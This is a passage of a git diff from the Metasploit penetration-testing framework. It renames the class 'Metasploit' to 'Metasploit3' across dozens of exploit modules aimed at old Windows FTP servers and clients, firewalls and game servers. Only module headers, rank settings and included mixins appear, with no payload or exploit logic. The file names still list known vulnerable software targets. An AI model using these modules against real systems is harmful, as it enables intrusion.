GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/firewall/blackice_pam_icq.rb b/modules/exploits/windows/firewall/blackice_pam_icq.rb index 1e68f75037..b2aa38f375 100644 --- a/modules/exploits/windows/firewall/blackice_pam_icq.rb +++ b/modules/exploits/windows/firewall/blackice_pam_icq.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/firewall/kerio_auth.rb b/modules/exploits/windows/firewall/kerio_auth.rb index 710d44f7cf..09ec293453 100644 --- a/modules/exploits/windows/firewall/kerio_auth.rb +++ b/modules/exploits/windows/firewall/kerio_auth.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/ftp/32bitftp_list_reply.rb b/modules/exploits/windows/ftp/32bitftp_list_reply.rb index 07c9870188..88764b31c3 100644 --- a/modules/exploits/windows/ftp/32bitftp_list_reply.rb +++ b/modules/exploits/windows/ftp/32bitftp_list_reply.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::FtpServer diff --git a/modules/exploits/windows/ftp/3cdaemon_ftp_user.rb b/modules/exploits/windows/ftp/3cdaemon_ftp_user.rb index 771b645492..6ae2f48820 100644 --- a/modules/exploits/windows/ftp/3cdaemon_ftp_user.rb +++ b/modules/exploits/windows/ftp/3cdaemon_ftp_user.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/aasync_list_reply.rb b/modules/exploits/windows/ftp/aasync_list_reply.rb index 32e88c51c2..86675200e1 100644 --- a/modules/exploits/windows/ftp/aasync_list_reply.rb +++ b/modules/exploits/windows/ftp/aasync_list_reply.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::FtpServer diff --git a/modules/exploits/windows/ftp/ability_server_stor.rb b/modules/exploits/windows/ftp/ability_server_stor.rb index 06e5488556..da254de1d6 100644 --- a/modules/exploits/windows/ftp/ability_server_stor.rb +++ b/modules/exploits/windows/ftp/ability_server_stor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/absolute_ftp_list_bof.rb b/modules/exploits/windows/ftp/absolute_ftp_list_bof.rb index 4e9a4dfe14..c740472f19 100644 --- a/modules/exploits/windows/ftp/absolute_ftp_list_bof.rb +++ b/modules/exploits/windows/ftp/absolute_ftp_list_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::FtpServer diff --git a/modules/exploits/windows/ftp/cesarftp_mkd.rb b/modules/exploits/windows/ftp/cesarftp_mkd.rb index 609d14f46a..0026fb5b96 100644 --- a/modules/exploits/windows/ftp/cesarftp_mkd.rb +++ b/modules/exploits/windows/ftp/cesarftp_mkd.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb b/modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb index fe83cf265e..ae905a9acd 100644 --- a/modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb +++ b/modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/ftp/dreamftp_format.rb b/modules/exploits/windows/ftp/dreamftp_format.rb index 7dde997c22..2c2707a2c7 100644 --- a/modules/exploits/windows/ftp/dreamftp_format.rb +++ b/modules/exploits/windows/ftp/dreamftp_format.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/ftp/easyfilesharing_pass.rb b/modules/exploits/windows/ftp/easyfilesharing_pass.rb index 65dfa4ac67..6223524b5b 100644 --- a/modules/exploits/windows/ftp/easyfilesharing_pass.rb +++ b/modules/exploits/windows/ftp/easyfilesharing_pass.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/easyftp_cwd_fixret.rb b/modules/exploits/windows/ftp/easyftp_cwd_fixret.rb index 312f8c0dad..db15f4a362 100644 --- a/modules/exploits/windows/ftp/easyftp_cwd_fixret.rb +++ b/modules/exploits/windows/ftp/easyftp_cwd_fixret.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/easyftp_list_fixret.rb b/modules/exploits/windows/ftp/easyftp_list_fixret.rb index 68018a1bcf..07c9cb90fc 100644 --- a/modules/exploits/windows/ftp/easyftp_list_fixret.rb +++ b/modules/exploits/windows/ftp/easyftp_list_fixret.rb @@ -14,7 +14,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/easyftp_mkd_fixret.rb b/modules/exploits/windows/ftp/easyftp_mkd_fixret.rb index 6117c07d51..7991c3fe5c 100644 --- a/modules/exploits/windows/ftp/easyftp_mkd_fixret.rb +++ b/modules/exploits/windows/ftp/easyftp_mkd_fixret.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/filecopa_list_overflow.rb b/modules/exploits/windows/ftp/filecopa_list_overflow.rb index 239d3850af..d876af7908 100644 --- a/modules/exploits/windows/ftp/filecopa_list_overflow.rb +++ b/modules/exploits/windows/ftp/filecopa_list_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/filewrangler_list_reply.rb b/modules/exploits/windows/ftp/filewrangler_list_reply.rb index 68bba29d46..2757eadf85 100644 --- a/modules/exploits/windows/ftp/filewrangler_list_reply.rb +++ b/modules/exploits/windows/ftp/filewrangler_list_reply.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::FtpServer diff --git a/modules/exploits/windows/ftp/freefloatftp_wbem.rb b/modules/exploits/windows/ftp/freefloatftp_wbem.rb index ba5b9b10a6..ab833037cc 100644 --- a/modules/exploits/windows/ftp/freefloatftp_wbem.rb +++ b/modules/exploits/windows/ftp/freefloatftp_wbem.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/freeftpd_pass.rb b/modules/exploits/windows/ftp/freeftpd_pass.rb index 57a745e99b..d39a39495b 100644 --- a/modules/exploits/windows/ftp/freeftpd_pass.rb +++ b/modules/exploits/windows/ftp/freeftpd_pass.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/freeftpd_user.rb b/modules/exploits/windows/ftp/freeftpd_user.rb index a2542ab76a..ff40940d5e 100644 --- a/modules/exploits/windows/ftp/freeftpd_user.rb +++ b/modules/exploits/windows/ftp/freeftpd_user.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/ftpgetter_pwd_reply.rb b/modules/exploits/windows/ftp/ftpgetter_pwd_reply.rb index a358baa07f..68b913acbc 100644 --- a/modules/exploits/windows/ftp/ftpgetter_pwd_reply.rb +++ b/modules/exploits/windows/ftp/ftpgetter_pwd_reply.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::FtpServer diff --git a/modules/exploits/windows/ftp/ftppad_list_reply.rb b/modules/exploits/windows/ftp/ftppad_list_reply.rb index f3488e7698..f8fc0893db 100644 --- a/modules/exploits/windows/ftp/ftppad_list_reply.rb +++ b/modules/exploits/windows/ftp/ftppad_list_reply.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Exploit::Remote::FtpServer diff --git a/modules/exploits/windows/ftp/ftpshell51_pwd_reply.rb b/modules/exploits/windows/ftp/ftpshell51_pwd_reply.rb index b3fca70ba1..4f8df2009c 100644 --- a/modules/exploits/windows/ftp/ftpshell51_pwd_reply.rb +++ b/modules/exploits/windows/ftp/ftpshell51_pwd_reply.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Exploit::Remote::FtpServer diff --git a/modules/exploits/windows/ftp/ftpsynch_list_reply.rb b/modules/exploits/windows/ftp/ftpsynch_list_reply.rb index fd5b073d17..91809dba78 100644 --- a/modules/exploits/windows/ftp/ftpsynch_list_reply.rb +++ b/modules/exploits/windows/ftp/ftpsynch_list_reply.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Exploit::Remote::FtpServer diff --git a/modules/exploits/windows/ftp/gekkomgr_list_reply.rb b/modules/exploits/windows/ftp/gekkomgr_list_reply.rb index 1f2717ac19..754d9afd7e 100644 --- a/modules/exploits/windows/ftp/gekkomgr_list_reply.rb +++ b/modules/exploits/windows/ftp/gekkomgr_list_reply.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::FtpServer diff --git a/modules/exploits/windows/ftp/globalscapeftp_input.rb b/modules/exploits/windows/ftp/globalscapeftp_input.rb index 24a4d89f44..497c2049ad 100644 --- a/modules/exploits/windows/ftp/globalscapeftp_input.rb +++ b/modules/exploits/windows/ftp/globalscapeftp_input.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/goldenftp_pass_bof.rb b/modules/exploits/windows/ftp/goldenftp_pass_bof.rb index a2e2bf1ba3..e90f25e4ba 100644 --- a/modules/exploits/windows/ftp/goldenftp_pass_bof.rb +++ b/modules/exploits/windows/ftp/goldenftp_pass_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/httpdx_tolog_format.rb b/modules/exploits/windows/ftp/httpdx_tolog_format.rb index 22bcde6671..5adb8fc2fb 100644 --- a/modules/exploits/windows/ftp/httpdx_tolog_format.rb +++ b/modules/exploits/windows/ftp/httpdx_tolog_format.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/kmftp_utility_cwd.rb b/modules/exploits/windows/ftp/kmftp_utility_cwd.rb index 061359055e..2799facccc 100644 --- a/modules/exploits/windows/ftp/kmftp_utility_cwd.rb +++ b/modules/exploits/windows/ftp/kmftp_utility_cwd.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/leapftp_list_reply.rb b/modules/exploits/windows/ftp/leapftp_list_reply.rb index 3c7ee51a86..a27b61a9ed 100644 --- a/modules/exploits/windows/ftp/leapftp_list_reply.rb +++ b/modules/exploits/windows/ftp/leapftp_list_reply.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::FtpServer diff --git a/modules/exploits/windows/ftp/leapftp_pasv_reply.rb b/modules/exploits/windows/ftp/leapftp_pasv_reply.rb index 62ff62deeb..b1b03bb545 100644 --- a/modules/exploits/windows/ftp/leapftp_pasv_reply.rb +++ b/modules/exploits/windows/ftp/leapftp_pasv_reply.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/ftp/ms09_053_ftpd_nlst.rb b/modules/exploits/windows/ftp/ms09_053_ftpd_nlst.rb index 0fc8c699d7..9345aca081 100644 --- a/modules/exploits/windows/ftp/ms09_053_ftpd_nlst.rb +++ b/modules/exploits/windows/ftp/ms09_053_ftpd_nlst.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/netterm_netftpd_user.rb b/modules/exploits/windows/ftp/netterm_netftpd_user.rb index 3820169c28..e1404937dd 100644 --- a/modules/exploits/windows/ftp/netterm_netftpd_user.rb +++ b/modules/exploits/windows/ftp/netterm_netftpd_user.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/odin_list_reply.rb b/modules/exploits/windows/ftp/odin_list_reply.rb index 473769b50b..5d672e54ec 100644 --- a/modules/exploits/windows/ftp/odin_list_reply.rb +++ b/modules/exploits/windows/ftp/odin_list_reply.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::FtpServer diff --git a/modules/exploits/windows/ftp/open_ftpd_wbem.rb b/modules/exploits/windows/ftp/open_ftpd_wbem.rb index 0b4aab380b..53fd3231d5 100644 --- a/modules/exploits/windows/ftp/open_ftpd_wbem.rb +++ b/modules/exploits/windows/ftp/open_ftpd_wbem.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/oracle9i_xdb_ftp_pass.rb b/modules/exploits/windows/ftp/oracle9i_xdb_ftp_pass.rb index 881fb96afd..6bd6afcda3 100644 --- a/modules/exploits/windows/ftp/oracle9i_xdb_ftp_pass.rb +++ b/modules/exploits/windows/ftp/oracle9i_xdb_ftp_pass.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/oracle9i_xdb_ftp_unlock.rb b/modules/exploits/windows/ftp/oracle9i_xdb_ftp_unlock.rb index 6553c50434..99b39220b0 100644 --- a/modules/exploits/windows/ftp/oracle9i_xdb_ftp_unlock.rb +++ b/modules/exploits/windows/ftp/oracle9i_xdb_ftp_unlock.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/pcman_stor.rb b/modules/exploits/windows/ftp/pcman_stor.rb index b018a96601..10ea810e86 100644 --- a/modules/exploits/windows/ftp/pcman_stor.rb +++ b/modules/exploits/windows/ftp/pcman_stor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/proftp_banner.rb b/modules/exploits/windows/ftp/proftp_banner.rb index 903911ce7c..91cf132b9e 100644 --- a/modules/exploits/windows/ftp/proftp_banner.rb +++ b/modules/exploits/windows/ftp/proftp_banner.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/ftp/quickshare_traversal_write.rb b/modules/exploits/windows/ftp/quickshare_traversal_write.rb index a7a8129046..043b6c2ccf 100644 --- a/modules/exploits/windows/ftp/quickshare_traversal_write.rb +++ b/modules/exploits/windows/ftp/quickshare_traversal_write.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/ricoh_dl_bof.rb b/modules/exploits/windows/ftp/ricoh_dl_bof.rb index 9ebf010ee7..2977243b78 100644 --- a/modules/exploits/windows/ftp/ricoh_dl_bof.rb +++ b/modules/exploits/windows/ftp/ricoh_dl_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/sami_ftpd_user.rb b/modules/exploits/windows/ftp/sami_ftpd_user.rb index dafd35011a..48bdbf0d8a 100644 --- a/modules/exploits/windows/ftp/sami_ftpd_user.rb +++ b/modules/exploits/windows/ftp/sami_ftpd_user.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/ftp/sasser_ftpd_port.rb b/modules/exploits/windows/ftp/sasser_ftpd_port.rb index 33ec7e87e6..0499103f04 100644 --- a/modules/exploits/windows/ftp/sasser_ftpd_port.rb +++ b/modules/exploits/windows/ftp/sasser_ftpd_port.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/scriptftp_list.rb b/modules/exploits/windows/ftp/scriptftp_list.rb index 8c2af167c9..0c8492f50e 100644 --- a/modules/exploits/windows/ftp/scriptftp_list.rb +++ b/modules/exploits/windows/ftp/scriptftp_list.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::FtpServer diff --git a/modules/exploits/windows/ftp/seagull_list_reply.rb b/modules/exploits/windows/ftp/seagull_list_reply.rb index 3e6d644019..eaf8b779f9 100644 --- a/modules/exploits/windows/ftp/seagull_list_reply.rb +++ b/modules/exploits/windows/ftp/seagull_list_reply.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::FtpServer diff --git a/modules/exploits/windows/ftp/servu_chmod.rb b/modules/exploits/windows/ftp/servu_chmod.rb index 19b893d8f3..3439995d2c 100644 --- a/modules/exploits/windows/ftp/servu_chmod.rb +++ b/modules/exploits/windows/ftp/servu_chmod.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Egghunter diff --git a/modules/exploits/windows/ftp/servu_mdtm.rb b/modules/exploits/windows/ftp/servu_mdtm.rb index 67f58d88ae..75c3f1fa63 100644 --- a/modules/exploits/windows/ftp/servu_mdtm.rb +++ b/modules/exploits/windows/ftp/servu_mdtm.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/slimftpd_list_concat.rb b/modules/exploits/windows/ftp/slimftpd_list_concat.rb index d755614ee0..dca878528b 100644 --- a/modules/exploits/windows/ftp/slimftpd_list_concat.rb +++ b/modules/exploits/windows/ftp/slimftpd_list_concat.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/trellian_client_pasv.rb b/modules/exploits/windows/ftp/trellian_client_pasv.rb index 9cfa5a5b04..de59a26cc6 100644 --- a/modules/exploits/windows/ftp/trellian_client_pasv.rb +++ b/modules/exploits/windows/ftp/trellian_client_pasv.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/ftp/turboftp_port.rb b/modules/exploits/windows/ftp/turboftp_port.rb index 2399cc9b04..92ff75127d 100644 --- a/modules/exploits/windows/ftp/turboftp_port.rb +++ b/modules/exploits/windows/ftp/turboftp_port.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/vermillion_ftpd_port.rb b/modules/exploits/windows/ftp/vermillion_ftpd_port.rb index e9c9c611e8..b587adc4f6 100644 --- a/modules/exploits/windows/ftp/vermillion_ftpd_port.rb +++ b/modules/exploits/windows/ftp/vermillion_ftpd_port.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/warftpd_165_pass.rb b/modules/exploits/windows/ftp/warftpd_165_pass.rb index 4d4caf6b57..1b8205a688 100644 --- a/modules/exploits/windows/ftp/warftpd_165_pass.rb +++ b/modules/exploits/windows/ftp/warftpd_165_pass.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/warftpd_165_user.rb b/modules/exploits/windows/ftp/warftpd_165_user.rb index 6001ade7bd..3dbe048b51 100644 --- a/modules/exploits/windows/ftp/warftpd_165_user.rb +++ b/modules/exploits/windows/ftp/warftpd_165_user.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/wftpd_size.rb b/modules/exploits/windows/ftp/wftpd_size.rb index 56a2ab06f0..1542008c2b 100644 --- a/modules/exploits/windows/ftp/wftpd_size.rb +++ b/modules/exploits/windows/ftp/wftpd_size.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/wing_ftp_admin_exec.rb b/modules/exploits/windows/ftp/wing_ftp_admin_exec.rb index 3722a11707..edefcd67a2 100644 --- a/modules/exploits/windows/ftp/wing_ftp_admin_exec.rb +++ b/modules/exploits/windows/ftp/wing_ftp_admin_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::CmdStager include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/ftp/wsftp_server_503_mkd.rb b/modules/exploits/windows/ftp/wsftp_server_503_mkd.rb index 464c8b9dfa..d5bcefe4af 100644 --- a/modules/exploits/windows/ftp/wsftp_server_503_mkd.rb +++ b/modules/exploits/windows/ftp/wsftp_server_503_mkd.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/wsftp_server_505_xmd5.rb b/modules/exploits/windows/ftp/wsftp_server_505_xmd5.rb index b7d5384e87..aef6f65f7d 100644 --- a/modules/exploits/windows/ftp/wsftp_server_505_xmd5.rb +++ b/modules/exploits/windows/ftp/wsftp_server_505_xmd5.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/xftp_client_pwd.rb b/modules/exploits/windows/ftp/xftp_client_pwd.rb index 892ae0dcf5..e4a300eca7 100644 --- a/modules/exploits/windows/ftp/xftp_client_pwd.rb +++ b/modules/exploits/windows/ftp/xftp_client_pwd.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/ftp/xlink_client.rb b/modules/exploits/windows/ftp/xlink_client.rb index 43aacffa6d..3ae6ee1c56 100644 --- a/modules/exploits/windows/ftp/xlink_client.rb +++ b/modules/exploits/windows/ftp/xlink_client.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/ftp/xlink_server.rb b/modules/exploits/windows/ftp/xlink_server.rb index 4ef4b5f3c0..3b3d16a5ae 100644 --- a/modules/exploits/windows/ftp/xlink_server.rb +++ b/modules/exploits/windows/ftp/xlink_server.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/games/mohaa_getinfo.rb b/modules/exploits/windows/games/mohaa_getinfo.rb index e87f4c3e93..406afdf4dc 100644 --- a/modules/exploits/windows/games/mohaa_getinfo.rb +++ b/modules/exploits/windows/games/mohaa_getinfo.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/games/racer_503beta5.rb b/modules/exploits/windows/games/racer_503beta5.rb index c6ec9c7138..e5dc86d847 100644 --- a/modules/exploits/windows/games/racer_503beta5.rb +++ b/modules/exploits/windows/games/racer_503beta5.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/games/ut2004_secure.rb b/modules/exploits/windows/games/ut2004_secure.rb index 1f855b02e8..c586e98158 100644 --- a/modules/exploits/windows/games/ut2004_secure.rb +++ b/modules/exploits/windows/games/ut2004_secure.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < 